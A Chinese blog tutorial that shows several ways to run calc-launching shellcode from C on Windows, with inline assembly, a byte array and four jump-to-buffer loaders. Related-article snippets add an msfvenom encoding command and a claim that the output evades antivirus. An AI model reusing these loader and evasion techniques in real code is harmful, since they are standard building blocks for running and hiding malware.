执行shellcode的几种方式

最新推荐文章于 2025-03-02 12:55:52 发布
最新推荐文章于 2025-03-02 12:55:52 发布
阅读量5.1k 收藏 13
点赞数 2
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/104486061
版权
本文详细介绍使用汇编语言在Windows环境下弹出计算器的方法。通过硬编码和多种shellcode执行技巧,如函数名修改、偏移地址调用、硬编码执行等,实现计算器的弹出。同时,提供了调试代码供读者参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先写出汇编成功弹出计算器

#pragma comment(linker,"/section:.data,RWE")	//data段可读写

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")	//不显示窗口

#pragma comment(linker,"/INCREMENTAL:NO")	//指定非增量编译
#include "windows.h"
void main()
{
	__asm{
	  sub esp,0x454
	  xor ebx,ebx
	  push ebx
	  mov eax,0x6578652e
	  push eax
	  mov eax,0x636c6163
	  push eax
	  mov eax,esp
	  push 5
	  push eax
	  mov eax,0x74f0dab0
	  call eax
	  mov esp,0x450
	  
   }
 }

下面这两条语句时和call dword ptr [WinExec]功能相同,可以利用这条语句找出自己机子上WinExec地址,然后将0x74f0dab0替换成自己机子上的地址

 mov eax,0x74f0dab0
 call eax

提取汇编的机器码

unsigned char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50"
"\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50"
"\xB8\xB0\xDA\xF0\x74\xFF\xD0"
"\xBC\x50\x04\x00\x00";

接下来就是如何执行shellcode了

0x01

将shellcode硬改成函数名,然后shellcode的内容相当于函数体

void Run1()
{
	((void(*)(void))&shellcode)();
}
0x02

取shellcode的偏移地址,然后到shellcode处执行

//第2种方法
void Run2()
{
	__asm{
		lea eax,shellcode
		jmp eax
	}
}
0x03

和0x02方法相同,写法不一样

//第3种方法

void Run3()
{

	__asm{
		mov eax,offset shellcode
		jmp eax
	}
}
0x04

用emit在当前位置直接插入数据(实际上是指令),硬编码执行

//第四种方法
void Run4()
{

	__asm{
		mov eax,offset shellcode
		_emit 0xff;	
		_emit 0xe0;
	}

}
调试
#pragma comment(linker,"/section:.data,RWE")	//data段可读写

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")	//不显示窗口

#pragma comment(linker,"/INCREMENTAL:NO")	//指定非增量编译
#include "windows.h"
unsigned char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50"
"\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50"
"\xB8\xB0\xDA\xF0\x74\xFF\xD0"
"\xBC\x50\x04\x00\x00";


//第一种方法
void Run1()
{
	((void(*)(void))&shellcode)();
}

//第2种方法
void Run2()
{
	__asm{
		lea eax,shellcode
		jmp eax
	}
}

//第3种方法

void Run3()
{

	__asm{
		mov eax,offset shellcode
		jmp eax
	}
}

//第四种方法
void Run4()
{

	__asm{
		mov eax,offset shellcode
		_emit 0xff;	//用emigt就是在当前位置直接插入数据(实际上是指令),硬编码执行
		_emit 0xe0;
	}

}

void main()
{

/*	
	__asm{
	  sub esp,0x454
	  xor ebx,ebx
	  push ebx
	  mov eax,0x6578652e
	  push eax
	  mov eax,0x636c6163
	  push eax
	  mov eax,esp
	  push 5
	  push eax
	  mov eax,0x74f0dab0
	  call eax
	  mov esp,0x450
	  
   }
   */
	
	Run1();
}

在这里插入图片描述
其他三种方法我都调试了都可以弹出计算器

演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 894
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
shellcode 执行
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
C语言执行shellcode的五种方法
热门推荐
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
32位shellcode编写demo
最新发布
weixin_54005873的博客
03-02 232
编译运行 运行后shellcode存入 code文件 load.exe加载运行code文件。两个文件 make_shellcode.c 是编写同时也是生成shellcode的代码。load.c是测试加载shellcode的代码。
shellcode执行盒_简单shellcode学习
weixin_39849127的博客
12-06 187
本文由“合天智汇”公众号首发 作者:hope引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode的编写。前置知识NX(堆栈不可执行)保护shellcode(一段16进制的数据,转化为字符串则为汇编代码)pwnable之start保护检测可以看到这道题目什么保...
EvilWMIProvider:安装并执行Shellcode
05-19
【EvilWMIProvider: 安装并执行Shellcode】是一种高级的恶意软件技术,它利用Windows Management Instrumentation(WMI)服务来持久化并执行恶意代码。WMI是Windows操作系统中的一个核心组件,用于管理系统配置和...
go-shellcode - Go语言编写的ShellCode执行工具.zip
07-18
总之,`go-shellcode`是Go语言环境下实现ShellCode执行的一个强大工具,它结合了Go语言的跨平台特性和内存安全性,为开发者提供了一种高效、灵活的方式来处理和执行ShellCode。在深入学习和使用这个工具时,了解...
Android系统shellcode编写.zip_android_shellcode
09-23
1. **权限限制**:Android系统采用了安全模型,如Linux的用户权限和SELinux,使得在非root环境下执行shellcode变得更加困难。攻击者需要找到绕过这些限制的方法,例如利用系统漏洞提升权限。 2. **内存布局**:与PC...
shellcode转换工具
07-26
它主要用于将特定的机器码(通常为汇编代码)转换成“Shellcode”,Shellcode是一种可以在目标系统上执行任意代码的二进制 payload。这个过程对于理解、创建和利用软件漏洞至关重要。 Shellcode在黑客社区和安全...
使用shellcode动态加载dll-易语言
06-11
3. **执行shellcode**:创建一个新的线程或者在当前线程中设置指令指针,使其指向shellcode的位置,然后触发执行。在易语言中,可能需要使用`CreateRemoteThread` API来创建新线程。 4. **DLL注入**:shellcode执行...
让其他程序强行执行自己的 ShellCode【C++】
LiWeiHua01的博客
09-08 743
让其他程序执行自己的代码
ShellcodeWrapper:优雅地封装与执行Shellcode
gitblog_00098的博客
04-20 423
ShellcodeWrapper:优雅地封装与执行Shellcode 去发现同类优质开源项目:https://gitcode.com/ Shellcode是黑客或安全研究员在利用软件漏洞时常用的代码片段,它可以直接在目标进程中执行,以实现特定功能,如权限提升或数据窃取。然而,直接处理和运行Shellcode并非易事,这需要对底层系统操作有深入理解。为了解决这一问题,项目应运而生,这是一个Pytho...
shellcode的运行方式2
qq_60870726的博客
11-15 1848
多复现了集中shellcode的运行方式
c语言code函数的使用方法,C语言执行shellcode的五种方法
weixin_42298645的博客
05-20 1381
#include //data段可读写#pragma comment(linker, "/section:.data,RWE")//不显示窗口#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")#pragma comment(linker, "/INCREMENTAL:NO")//一段打开Windows...
linux下执行shellcode
天元喜羊羊的博客
01-23 5469
参考了其他文章。   C语言代码如下: #include #include char sc[] = "\x31\xc0" "\x50" "\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\xb0\x0b" "\
投稿 | 初始ShellcodeShellcode执行工具编写思路
Ms08067安全实验室
04-19 536
文章来源|MS08067 公众号读者投稿本文作者:Arks7(Ms08067实验室读者)这是一段C++ 加载器的代码,代码来之倾旋大佬的博客,先看大佬给的注释。#include// 入口...
python 执行shellcode_执行shellcode的方法
weixin_39518678的博客
12-05 862
前言进程内存布局需要理解的第一个概念是,整个虚拟内存空间分为两个相关部分:为用户进程保留的虚拟内存空间(用户空间)和为系统进程保留的虚拟内存空间(内核空间),如下所示当处理器读写内存位置时,它使用一个虚拟地址。作为读写操作的一部分,处理器将虚拟地址转换为物理地址。通过虚拟地址访问内存具有这些优点:程序可以使用一个连续的虚拟地址范围来访问物理内存中不相邻的大内存缓冲区程序可以使用一定范围的虚拟地址来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值